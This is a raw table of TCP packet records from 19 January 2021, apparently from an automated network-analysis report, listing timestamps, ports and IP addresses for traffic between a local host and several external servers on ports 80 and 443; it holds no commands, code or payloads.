Jan 19, 2021 12:12:50.980648041 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:12:50.980715990 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:12:50.980786085 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:12:50.980864048 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:50.980921984 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:50.980989933 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:50.981122017 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:50.981165886 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:50.981173038 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023585081 CET	443	49738	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023617983 CET	443	49738	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023648977 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023648977 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023674965 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023675919 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023705006 CET	443	49737	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023730993 CET	443	49737	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023761034 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023763895 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023780107 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023796082 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023835897 CET	443	49739	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023873091 CET	443	49739	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023904085 CET	443	49740	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023929119 CET	443	49735	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023952007 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023956060 CET	443	49735	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.023983002 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.023989916 CET	443	49740	151.101.1.44	192.168.2.3
Jan 19, 2021 12:12:51.024005890 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.024025917 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.024044037 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.024074078 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:12:51.033797026 CET	443	49732	87.248.118.23	192.168.2.3
Jan 19, 2021 12:12:51.033885002 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:12:51.034109116 CET	443	49733	87.248.118.23	192.168.2.3
Jan 19, 2021 12:12:51.034177065 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:12:51.038218021 CET	443	49734	87.248.118.23	192.168.2.3
Jan 19, 2021 12:12:51.038273096 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:13:01.863729954 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:01.863787889 CET	49766	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:01.909624100 CET	80	49766	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:01.909667969 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:01.909753084 CET	49766	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:01.909817934 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:01.911007881 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:01.956885099 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027249098 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027314901 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027369022 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027374029 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.027405977 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.027420044 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027435064 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.027473927 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027493954 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.027527094 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027550936 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.027578115 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027628899 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027688980 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.027709007 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.027759075 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.028141022 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.073671103 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073698044 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073714972 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073730946 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073749065 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073765039 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073786974 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073791027 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.073811054 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073812008 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.073833942 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073858976 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.073859930 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073878050 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.073884964 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073908091 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073925972 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.073931932 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073935032 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.073951006 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.073955059 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073978901 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.073982954 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.074001074 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.074003935 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.074026108 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.074026108 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.074047089 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.074059963 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.074065924 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.074075937 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.074084997 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.074106932 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.074136972 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.119967937 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120001078 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120027065 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120052099 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120076895 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120104074 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120116949 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120127916 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120151043 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120170116 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120173931 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120187044 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120198011 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120220900 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120235920 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120244026 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120248079 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120266914 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120290041 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120290995 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120315075 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120327950 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120337963 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120342970 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120376110 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120378017 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120383024 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120399952 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120424986 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120449066 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120470047 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120492935 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120517015 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120523930 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120539904 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120564938 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120565891 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120589018 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120603085 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120611906 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120611906 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120635986 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120637894 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120659113 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120671034 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120682001 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120695114 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120703936 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120716095 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120726109 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120753050 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120754004 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120769978 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120779037 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120801926 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120824099 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120825052 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120831013 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120847940 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120852947 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120868921 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120873928 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120891094 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120894909 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120908976 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.120919943 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.120959044 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.121063948 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.167465925 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.167560101 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.167664051 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.167701960 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.167793036 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.167850018 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.167891026 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.167937994 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.167963028 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168004990 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168018103 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168050051 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168088913 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168124914 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168164015 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168205976 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168248892 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168251038 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168313980 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168363094 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168406010 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168442965 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168495893 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168497086 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168535948 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168538094 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168575048 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168581963 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168612957 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168649912 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168678999 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168708086 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168746948 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168783903 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168787956 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168822050 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168867111 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168869972 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168915033 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168926954 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168934107 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.168952942 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.168993950 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169032097 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169068098 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169106007 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169106960 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169121027 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169145107 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169166088 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169193983 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169203997 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169236898 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169275045 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169313908 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169332027 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169353008 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169369936 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169409990 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169459105 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169497967 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169536114 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169574976 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169610977 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169614077 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169648886 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169656038 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169688940 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169692039 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169707060 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169737101 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169780016 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169816971 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169855118 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169879913 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169893980 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169908047 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.169931889 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.169970036 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170007944 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170053005 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170054913 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170069933 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170097113 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170111895 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170135975 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170175076 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170212984 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170248985 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170248985 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170288086 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170289993 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170329094 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170330048 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170386076 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170391083 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170438051 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170439959 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170480013 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170526028 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170545101 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170569897 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170577049 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170609951 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170649052 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170686007 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170721054 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170749903 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170778990 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170809984 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170846939 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170883894 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170885086 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170926094 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170962095 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.170964956 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.170983076 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.171000957 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.171037912 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.171083927 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.171144009 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.217314959 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217407942 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217487097 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217582941 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.217726946 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217776060 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217818022 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217854023 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217928886 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217967987 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.217987061 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.218007088 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218054056 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218096018 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218133926 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218170881 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218190908 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.218210936 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218246937 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218283892 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218321085 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218365908 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218375921 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.218410969 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218447924 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218487024 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218523026 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218559027 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.218579054 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.218592882 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.220464945 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.356360912 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.402467966 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.402982950 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.403026104 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.403062105 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.403107882 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.403145075 CET	80	49765	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:02.403167009 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.403219938 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:02.403228045 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:03.124877930 CET	49765	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:03.125001907 CET	49766	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.065694094 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.066117048 CET	49768	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.111742973 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.111923933 CET	80	49768	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.112061977 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.112210989 CET	49768	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.112971067 CET	49767	80	192.168.2.3	185.186.244.49
Jan 19, 2021 12:13:04.159382105 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191454887 CET	80	49767	185.186.244.49	192.168.2.3
Jan 19, 2021 12:13:04.191514015 CET	80	49767	185.186.244.49	192.168.2.3
